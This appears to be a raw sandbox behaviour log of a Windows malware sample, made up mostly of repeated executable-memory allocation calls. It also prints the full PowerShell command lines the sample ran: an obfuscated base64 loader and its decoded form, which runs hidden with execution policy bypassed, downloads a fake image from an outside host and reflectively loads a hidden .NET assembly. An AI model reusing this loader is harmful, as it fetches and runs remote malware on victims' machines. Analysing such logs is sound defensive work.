protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72891000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2696
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72892000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x029b0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b00000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b01000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b02000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b03000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b04000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b05000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b06000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b07000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b08000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b09000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b0a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b0b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b0c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b0d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b0e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b0f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b11000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b12000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b13000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2696
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02b14000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚V♛♚Bl♛♚Hg♛♚d♛♚♛♚u♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚BP♛♚GY♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚Ck♛♚Ow♛♚k♛♚GU♛♚bgBk♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚SQBu♛♚GQ♛♚ZQB4♛♚E8♛♚Zg♛♚o♛♚CQ♛♚ZQBu♛♚GQ♛♚RgBs♛♚GE♛♚Zw♛♚p♛♚Ds♛♚J♛♚Bz♛♚HQ♛♚YQBy♛♚HQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚GU♛♚I♛♚♛♚w♛♚C♛♚♛♚LQBh♛♚G4♛♚Z♛♚♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQBn♛♚HQ♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚I♛♚♛♚r♛♚D0♛♚I♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C4♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚Ow♛♚k♛♚GI♛♚YQBz♛♚GU♛♚Ng♛♚0♛♚Ew♛♚ZQBu♛♚Gc♛♚d♛♚Bo♛♚C♛♚♛♚PQ♛♚g♛♚CQ♛♚ZQBu♛♚GQ♛♚SQBu♛♚GQ♛♚ZQB4♛♚C♛♚♛♚LQ♛♚g♛♚CQ♛♚cwB0♛♚GE♛♚cgB0♛♚Ek♛♚bgBk♛♚GU♛♚e♛♚♛♚7♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚
k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBU♛♚GU♛♚e♛♚B0♛♚C4♛♚UwB1♛♚GI♛♚cwB0♛♚HI♛♚aQBu♛♚Gc♛♚K♛♚♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚Bl♛♚Hg♛♚L♛♚♛♚g♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚T♛♚Bl♛♚G4♛♚ZwB0♛♚Gg♛♚KQ♛♚7♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚EM♛♚bwBu♛♚HY♛♚ZQBy♛♚HQ♛♚XQ♛♚6♛♚Do♛♚RgBy♛♚G8♛♚bQBC♛♚GE♛♚cwBl♛♚DY♛♚N♛♚BT♛♚HQ♛♚cgBp♛♚G4♛♚Zw♛♚o♛♚CQ♛♚YgBh♛♚HM♛♚ZQ♛♚2♛♚DQ♛♚QwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚♛♚p♛♚Ds♛♚J♛♚Bs♛♚G8♛♚YQBk♛♚GU♛♚Z♛♚BB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FI♛♚ZQBm♛♚Gw♛♚ZQBj♛♚HQ♛♚aQBv♛♚G4♛♚LgBB♛♚HM♛♚cwBl♛♚G0♛♚YgBs♛♚Hk♛♚XQ♛♚6♛♚Do♛♚T♛♚Bv♛♚GE♛♚Z♛♚♛♚o♛♚CQ♛♚YwBv♛♚G0♛♚bQBh♛♚G4♛♚Z♛♚BC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚KQ♛♚7♛♚CQ♛♚d♛♚B5♛♚H♛♚♛♚ZQ♛♚g♛♚D0♛♚I♛♚♛♚k♛♚Gw♛♚bwBh♛♚GQ♛♚ZQBk♛♚EE♛♚cwBz♛♚GU♛♚bQBi♛♚Gw♛♚eQ♛♚u♛♚Ec♛♚ZQB0♛♚FQ♛♚eQBw♛♚GU♛♚K♛♚♛♚n♛♚EY♛♚aQBi♛♚GU♛♚cg♛♚u♛♚Eg♛♚bwBt♛♚GU♛♚Jw♛♚p♛♚Ds♛♚J♛♚Bt♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚g♛♚D0♛♚I♛♚♛♚k♛♚HQ♛♚eQBw♛♚GU♛♚LgBH♛♚GU♛♚d♛♚BN♛♚GU♛♚d♛♚Bo♛♚G8♛♚Z♛♚♛♚o♛♚Cc♛♚VgBB♛♚Ek♛♚Jw♛♚p♛♚C4♛♚SQBu♛♚HY♛♚bwBr♛♚GU♛♚K♛♚♛♚k♛♚G4♛♚dQBs♛♚Gw♛♚L♛♚♛♚g♛♚Fs♛♚bwBi♛♚Go♛♚ZQBj♛♚HQ♛♚WwBd♛♚F0♛♚I♛♚♛♚o♛♚Cc♛♚Z♛♚BI♛♚Gg♛♚M♛♚BM♛♚G4♛♚a♛♚♛♚z♛♚Fo♛♚MgBZ♛♚Ho♛♚T♛♚B6♛♚GM♛♚M♛♚BM♛♚Go♛♚WQ♛♚w♛♚E0♛♚aQ♛♚0♛♚Hk♛♚TwBT♛♚DQ♛♚e♛♚BP♛♚FM♛♚O♛♚B2♛♚E8♛♚bgBC♛♚D♛♚♛♚Z♛♚BH♛♚Gc♛♚PQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚Z♛♚Bm♛♚GQ♛♚ZgBk♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GY♛♚Z♛♚Bm♛♚Cc♛♚I♛♚♛♚s♛♚C♛♚♛♚JwBk♛♚GE♛♚Z♛♚Bz♛♚GE♛♚Jw♛♚g♛♚Cw♛♚I♛♚♛♚n♛♚GQ♛♚ZQ♛♚n♛♚C♛♚♛♚L♛♚♛♚g♛♚Cc♛♚YwB1♛♚Cc♛♚KQ♛♚p♛♚♛♚==';$OWjuxd = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($codigo.replace('♛♚','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxd"
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/666/683/original/js.jpg?1700183864';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0Lnh3Z2YzLzc0LjY0Mi4yOS4xOS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2700
thread_handle: 0x0000057c
process_identifier: 2696
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚I♛♚♛♚9♛♚C♛♚♛♚JwBo♛♚HQ♛♚d♛♚Bw♛♚HM♛♚Og♛♚v♛♚C8♛♚dQBw♛♚Gw♛♚bwBh♛♚GQ♛♚Z♛♚Bl♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBu♛♚HM♛♚LgBj♛♚G8♛♚bQ♛♚u♛♚GI♛♚cg♛♚v♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBz♛♚C8♛♚M♛♚♛♚w♛♚DQ♛♚Lw♛♚2♛♚DY♛♚Ng♛♚v♛♚DY♛♚O♛♚♛♚z♛♚C8♛♚bwBy♛♚Gk♛♚ZwBp♛♚G4♛♚YQBs♛♚C8♛♚agBz♛♚C4♛♚agBw♛♚Gc♛♚Pw♛♚x♛♚Dc♛♚M♛♚♛♚w♛♚DE♛♚O♛♚♛♚z♛♚Dg♛♚Ng♛♚0♛♚Cc♛♚Ow♛♚k♛♚Hc♛♚ZQBi♛♚EM♛♚b♛♚Bp♛♚GU♛♚bgB0♛♚C♛♚♛♚PQ♛♚g♛♚E4♛♚ZQB3♛♚C0♛♚TwBi♛♚Go♛♚ZQBj♛♚HQ♛♚I♛♚BT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚E4♛♚ZQB0♛♚C4♛♚VwBl♛♚GI♛♚QwBs♛♚Gk♛♚ZQBu♛♚HQ♛♚Ow♛♚k♛♚Gk♛♚bQBh♛♚Gc♛♚ZQBC♛♚Hk♛♚d♛♚Bl♛♚HM♛♚I♛♚♛♚9♛♚C♛♚♛♚J♛♚B3♛♚GU♛♚YgBD♛♚Gw♛♚aQBl♛♚G4♛♚d♛♚♛♚u♛♚EQ♛♚bwB3♛♚G4♛♚b♛♚Bv♛♚GE♛♚Z♛♚BE♛♚GE♛♚d♛♚Bh♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚VQBy♛♚Gw♛♚KQ♛♚7♛♚CQ♛♚aQBt♛♚GE♛♚ZwBl♛♚FQ♛♚ZQB4♛♚HQ♛♚I♛♚♛♚9♛♚C♛♚♛♚WwBT♛♚Hk♛♚cwB0♛♚GU♛♚bQ♛♚u♛♚FQ♛♚ZQB4♛♚HQ♛♚LgBF♛♚G4♛♚YwBv♛♚GQ♛♚aQBu♛♚Gc♛♚XQ♛♚6♛♚Do♛♚VQBU♛♚EY♛♚O♛♚♛♚u♛♚Ec♛♚ZQB0♛♚FM♛♚d♛♚By♛♚Gk♛♚bgBn♛♚Cg♛♚J♛♚Bp♛♚G0♛♚YQBn♛♚GU♛♚QgB5♛♚HQ♛♚ZQBz♛♚Ck♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚UwBU♛♚EE♛♚UgBU♛♚D4♛♚Pg♛♚n♛♚Ds♛♚J♛♚Bl♛♚G4♛♚Z♛♚BG♛♚Gw♛♚YQBn♛♚C♛♚♛♚PQ♛♚g♛♚Cc♛♚P♛♚♛♚8♛♚EI♛♚QQBT♛♚EU♛♚Ng♛♚0♛♚F8♛♚RQBO♛♚EQ♛♚Pg♛♚+♛♚Cc♛♚Ow♛♚k♛♚HM♛♚d♛♚Bh♛♚HI♛♚d♛♚BJ♛♚G4♛♚Z♛♚B